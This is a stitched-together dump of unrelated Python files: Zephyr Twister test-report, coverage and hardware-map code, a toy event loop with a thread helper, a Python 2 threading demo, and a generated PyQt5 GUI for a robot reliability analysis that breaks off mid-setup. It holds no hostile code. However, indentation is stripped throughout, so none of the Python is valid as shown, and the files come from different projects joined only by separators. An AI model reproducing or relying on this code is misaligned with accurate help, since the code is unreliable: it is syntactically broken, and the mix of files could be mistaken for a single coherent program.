@staticmethod
def xunit_testcase(eleTestsuite, name, classname, status, ts_status, reason, duration, runnable, stats, log, build_only_as_skip):
fails, passes, errors, skips = stats
if status in ['skipped', 'filtered']:
duration = 0
eleTestcase = ET.SubElement(
eleTestsuite, "testcase",
classname=classname,
name=f"{name}",
time=f"{duration}")
if status in ['skipped', 'filtered']:
skips += 1
# temporarily add build_only_as_skip to restore existing CI report behaviour
if ts_status == "passed" and not runnable:
tc_type = "build"
else:
tc_type = status
ET.SubElement(eleTestcase, 'skipped', type=f"{tc_type}", message=f"{reason}")
elif status in ["failed", "blocked"]:
fails += 1
el = ET.SubElement(eleTestcase, 'failure', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == "error":
errors += 1
el = ET.SubElement(eleTestcase, 'error', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == 'passed':
if not runnable and build_only_as_skip:
ET.SubElement(eleTestcase, 'skipped', type="build", message="built only")
skips += 1
else:
passes += 1
else:
if not status:
logger.debug(f"{name}: No status")
ET.SubElement(eleTestcase, 'skipped', type=f"untested", message="No results captured, testsuite misconfiguration?")
else:
logger.error(f"{name}: Unknown status '{status}'")
return (fails, passes, errors, skips)
# Generate a report with all testsuites instead of doing this per platform
def xunit_report_suites(self, json_file, filename):
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
suites_to_report = all_suites
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
suites_to_report = list(filter(lambda d: d.get('status') != "filtered", all_suites))
for suite in suites_to_report:
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=suite.get("name"), time="0",
timestamp = self.timestamp,
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
ET.SubElement(eleTSPropetries, 'property', name="platform", value=suite.get("platform"))
ET.SubElement(eleTSPropetries, 'property', name="architecture", value=suite.get("arch"))
total = 0
fails = passes = errors = skips = 0
handler_time = suite.get('execution_time', 0)
runnable = suite.get('runnable', 0)
duration += float(handler_time)
ts_status = suite.get('status')
for tc in suite.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', suite.get('reason', 'Unknown'))
log = tc.get("log", suite.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def xunit_report(self, json_file, filename, selected_platform=None, full_report=False):
if selected_platform:
selected = [selected_platform]
logger.info(f"Writing target report for {selected_platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
for platform in selected:
suites = list(filter(lambda d: d['platform'] == platform, all_suites))
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
non_filtered = list(filter(lambda d: d.get('status') != "filtered", suites))
if not non_filtered:
continue
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=platform,
timestamp = self.timestamp,
time="0",
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
total = 0
fails = passes = errors = skips = 0
for ts in suites:
handler_time = ts.get('execution_time', 0)
runnable = ts.get('runnable', 0)
duration += float(handler_time)
ts_status = ts.get('status')
# Do not report filtered testcases
if ts_status == 'filtered' and not self.detailed_skipped_report:
continue
if full_report:
for tc in ts.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', ts.get('reason', 'Unknown'))
log = tc.get("log", ts.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
else:
reason = ts.get('reason', 'Unknown')
name = ts.get("name")
classname = f"{platform}:{name}"
log = ts.get("log")
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, ts_status, ts_status, reason, duration, runnable,
(fails, passes, errors, skips), log, False)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def json_report(self, filename, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
suites = []
for instance in self.instances.values():
suite = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
suite = {
"name": instance.testsuite.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
}
if instance.run_id:
suite['run_id'] = instance.run_id
suite["runnable"] = False
if instance.status != 'filtered':
suite["runnable"] = instance.run
if ram_size:
suite["ram_size"] = ram_size
if rom_size:
suite["rom_size"] = rom_size
if instance.status in ["error", "failed"]:
suite['status'] = instance.status
suite["reason"] = instance.reason
# FIXME
if os.path.exists(handler_log):
suite["log"] = self.process_log(handler_log)
elif os.path.exists(device_log):
suite["log"] = self.process_log(device_log)
else:
suite["log"] = self.process_log(build_log)
elif instance.status == 'filtered':
suite["status"] = "filtered"
suite["reason"] = instance.reason
elif instance.status == 'passed':
suite["status"] = "passed"
elif instance.status == 'skipped':
suite["status"] = "skipped"
suite["reason"] = instance.reason
if instance.status is not None:
suite["execution_time"] = f"{float(handler_time):.2f}"
testcases = []
if len(instance.testcases) == 1:
single_case_duration = f"{float(handler_time):.2f}"
else:
single_case_duration = 0
for case in instance.testcases:
testcase = {}
testcase['identifier'] = case.name
if instance.status:
if single_case_duration:
testcase['execution_time'] = single_case_duration
else:
testcase['execution_time'] = f"{float(case.duration):.2f}"
if case.output != "":
testcase['log'] = case.output
if case.status == "skipped":
if instance.status == "filtered":
testcase["status"] = "filtered"
else:
testcase["status"] = "skipped"
testcase["reason"] = case.reason or instance.reason
else:
testcase["status"] = case.status
if case.reason:
testcase["reason"] = case.reason
testcases.append(testcase)
suite['testcases'] = testcases
suites.append(suite)
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testsuite(self, identifier):
results = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
if case == identifier:
results.append(ts)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
Verify if platform name (passed by --platform option, or in yaml file
as platform_allow or integration_platforms options) is correct. If not -
log and raise error.
"""
for platform in platform_names_to_verify:
if platform in self.platform_names:
break
else:
logger.error(f"{log_info} - unrecognized platform - {platform}")
sys.exit(2)
def create_build_dir_links(self):
"""
Iterate through all no-skipped instances in suite and create links
for each one build directories. Those links will be passed in the next
steps to the CMake command.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
Create build directory with original "long" path. Next take shorter
path and link them with original path - create link. At the end
replace build_dir to created link. This link will be passed to CMake
command. This action helps to limit path length which can be
significant during building by CMake on Windows OS.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
runner_params=None,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.runner_params = runner_params
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
runner_params = dut.get('runner_params')
serial_pty = dut.get('serial_pty')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
connected= dut.get('connected') and ((serial or serial_pty) is not None)
new_dut = DUT(platform=platform,
product=product,
runner=runner,
runner_params=runner_params,
id=id,
serial_pty=serial_pty,
serial=serial,
serial_baud=baud,
connected=connected,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x.get('id', ''))
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
|
event_loop_05_thread.py
|
# event_loop_05_thread.py
# This version of the event loop shows how to use sockets and
# I/O multiplexing to implement the to_thread() coroutine
# that runs a specified callable in a separate thread,
# yields the control and resumes when the result is ready.
#
# The event loop is NOT presented in the post.
from collections import deque
import pickle
import selectors
import socket
import time
import types
import threading
class EventLoopThread:
def __init__(self):
self.tasks_to_run = deque([])
self.sel = selectors.DefaultSelector()
def create_task(self, coro):
self.tasks_to_run.append(coro)
@types.coroutine
def sock_recv(self, sock, n):
yield 'wait_read', sock
return sock.recv(n)
@types.coroutine
def sock_sendall(self, sock, data):
yield 'wait_write', sock
sock.sendall(data)
@types.coroutine
def sock_accept(self, sock):
yield 'wait_read', sock
return sock.accept()
@types.coroutine
def to_thread(self, callable):
def callable_wrapper():
result = callable()
sock1.sendall(pickle.dumps(result))
sock1, sock2 = socket.socketpair()
threading.Thread(target=callable_wrapper).start()
yield 'wait_read', sock2
return pickle.loads(sock2.recv(4096))
def run(self):
while True:
if self.tasks_to_run:
task = self.tasks_to_run.popleft()
try:
op, arg = task.send(None)
except StopIteration:
continue
if op == 'wait_read':
self.sel.register(arg, selectors.EVENT_READ, task)
elif op == 'wait_write':
self.sel.register(arg, selectors.EVENT_WRITE, task)
else:
raise ValueError('Unknown event loop operation:', op)
else:
for key, _ in self.sel.select():
task = key.data
sock = key.fileobj
self.sel.unregister(sock)
self.create_task(task)
# How to use to_thread()
def compute():
# some long computation
time.sleep(2)
return 2
async def coro():
res = await loop.to_thread(compute)
print(res)
if __name__ == '__main__':
loop = EventLoopThread()
loop.create_task(coro())
loop.run()
# Ctrl+C to stop
|
thread_tool.py
|
#!/usr/bin/python
#coding=utf-8
# test thread in python
"""
@brief test thread in python
@date 2018-02-08
"""
import thread
import threading
import time
def printNum(numbers, a_lock):
if a_lock.acquire():
for i in range(numbers):
print str(i)+"\n"
a_lock.release()
def print_num_in_multi_thread():
a_lock = thread.allocate_lock()
thread.start_new_thread(printNum, (3,a_lock))
thread.start_new_thread(printNum, (4,a_lock))
def how_to_use_sleep():
while 1:
print "hello"
time.sleep(10)
return
def excute_in_thread():
#param = ()
#it = thread.start_new_thread(how_to_use_sleep, ())
#print it
t = threading.Thread(target=how_to_use_sleep)
t.start()
t.join()
return
#excute_in_thread()
|
potc_gui_v_2.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'potc_analysis_gui.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
#import rospy
import math
import pandas as pd
import os
import sys
import csv
import time
import threading
from datetime import datetime
class POTC_Analysis(object):
"""
threshold_type:
True = System POTC Value
False = System Reliability Value
load_control:
True = Failure Rate Calculation Using Operating Load
False = Only Failure Rate
"""
def __init__(self):
#self.robot_column_no_dict = {"Yuk": {"Count": 21, "1": 3, "2": 26, "3": 49}, "Mesafe": {"1": 3, "2": 27, "3": 51}, "Hiz": {"1": 81, "2": 149, "3": 217}} # 3 Robot
#self.robot_column_no_dict = {"Yuk": {"Count": 19, "1": 3, "2": 24, "3": 45, "4": 66}, "Mesafe": {"1": 3, "2": 25, "3": 47, "4": 69}, "Hiz": {"1": 81, "2": 149, "3": 217}} # 4 Robot
self.robot_column_no_dict = {"Yuk": {"Count": 15, "1": 3, "2": 20, "3": 37, "4": 54, "5": 71, "6": 88}, "Mesafe": {"1": 3, "2": 21, "3": 39, "4": 57, "5": 75, "6": 93}, "Hiz": {"1": 81, "2": 149, "3": 217}} # 6 Robot
self.distance_list = list()
self.robot_main_dict = {"Yuk": dict(), "Mesafe": dict()}
self.current_workspace = self.get_current_workspace()
self.distance_filename = "distances"
"""
# 4 Robot
self.route_load_filename = "1003_routeLoads_distance4"
self.route_set_filename = "1003_routeSet_distance4"
"""
# 6 Robot
self.route_load_filename = "Distancefor6Robot_Load"
self.route_set_filename = "Distancefor6Robot_Route"
self.robot_count = 0
self.initial_configuration_dict = dict()
self.load_control = True
self.threshold_type = True
self.threshold_value = 0.5
self.route_count = 0
# ------------------------------------------------------------------------------------------------
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(950, 700)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(950, 700))
MainWindow.setMaximumSize(QtCore.QSize(950, 700))
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.groupBox_selection_analysis = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_selection_analysis.setGeometry(QtCore.QRect(20, 20, 570, 330))
font = QtGui.QFont()
font.setPointSize(15)
self.groupBox_selection_analysis.setFont(font)
self.groupBox_selection_analysis.setObjectName("groupBox_selection_analysis")
self.comboBox_select_threshold_type = QtWidgets.QComboBox(self.groupBox_selection_analysis)
self.comboBox_select_threshold_type.setGeometry(QtCore.QRect(275, 150, 150, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.comboBox_select_threshold_type.setFont(font)
self.comboBox_select_threshold_type.setObjectName("comboBox_select_threshold_type")
self.label_5 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_5.setGeometry(QtCore.QRect(0, 150, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_5.setFont(font)
self.label_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_5.setObjectName("label_5")
self.doubleSpinBox_threshold_value = QtWidgets.QDoubleSpinBox(self.groupBox_selection_analysis)
self.doubleSpinBox_threshold_value.setGeometry(QtCore.QRect(275, 200, 100, 35))
self.doubleSpinBox_threshold_value.setDecimals(5)
self.doubleSpinBox_threshold_value.setMaximum(1.0)
self.doubleSpinBox_threshold_value.setSingleStep(0.05)
self.doubleSpinBox_threshold_value.setProperty("value", 0.5)
self.doubleSpinBox_threshold_value.setObjectName("doubleSpinBox_threshold_value")
self.label_8 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_8.setGeometry(QtCore.QRect(0, 200, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_8.setFont(font)
self.label_8.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_8.setObjectName("label_8")
self.label_9 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_9.setGeometry(QtCore.QRect(0, 250, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_9.setFont(font)
self.label_9.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_9.setObjectName("label_9")
self.spinBox_route_count = QtWidgets.QSpinBox(self.groupBox_selection_analysis)
self.spinBox_route_count.setGeometry(QtCore.QRect(275, 250, 100, 35))
self.spinBox_route_count.setMaximum(100000)
self.spinBox_route_count.setObjectName("spinBox_route_count")
self.label_10 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_10.setGeometry(QtCore.QRect(120, 290, 271, 41))
font = QtGui.QFont()
font.setPointSize(8)
self.label_10.setFont(font)
self.label_10.setTextFormat(QtCore.Qt.AutoText)
self.label_10.setScaledContents(False)
self.label_10.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_10.setWordWrap(True)
self.label_10.setObjectName("label_10")
self.label_3 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_3.setGeometry(QtCore.QRect(0, 100, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_3.setFont(font)
self.label_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_3.setObjectName("label_3")
self.comboBox_load_data = QtWidgets.QComboBox(self.groupBox_selection_analysis)
self.comboBox_load_data.setGeometry(QtCore.QRect(275, 100, 150, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.comboBox_load_data.setFont(font)
self.comboBox_load_data.setObjectName("comboBox_load_data")
self.spinBox_robot_route_count = QtWidgets.QSpinBox(self.groupBox_selection_analysis)
self.spinBox_robot_route_count.setGeometry(QtCore.QRect(275, 50, 100, 35))
self.spinBox_robot_route_count.setMinimum(1)
self.spinBox_robot_route_count.setMaximum(1000)
self.spinBox_robot_route_count.setObjectName("spinBox_robot_route_count")
self.pushButton_set_robot_count = QtWidgets.QPushButton(self.groupBox_selection_analysis)
self.pushButton_set_robot_count.setGeometry(QtCore.QRect(460, 40, 100, 50))
font = QtGui.QFont()
font.setPointSize(15)
self.pushButton_set_robot_count.setFont(font)
self.pushButton_set_robot_count.setObjectName("pushButton_set_robot_count")
self.label_11 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_11.setGeometry(QtCore.QRect(0, 50, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_11.setFont(font)
self.label_11.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_11.setObjectName("label_11")
self.plainTextEdit_result_view = QtWidgets.QPlainTextEdit(self.centralwidget)
self.plainTextEdit_result_view.setGeometry(QtCore.QRect(620, 35, 300, 500))
self.plainTextEdit_result_view.setReadOnly(True)
self.plainTextEdit_result_view.setPlainText("")
self.plainTextEdit_result_view.setObjectName("plainTextEdit_result_view")
self.pushButton_start_analysis = QtWidgets.QPushButton(self.centralwidget)
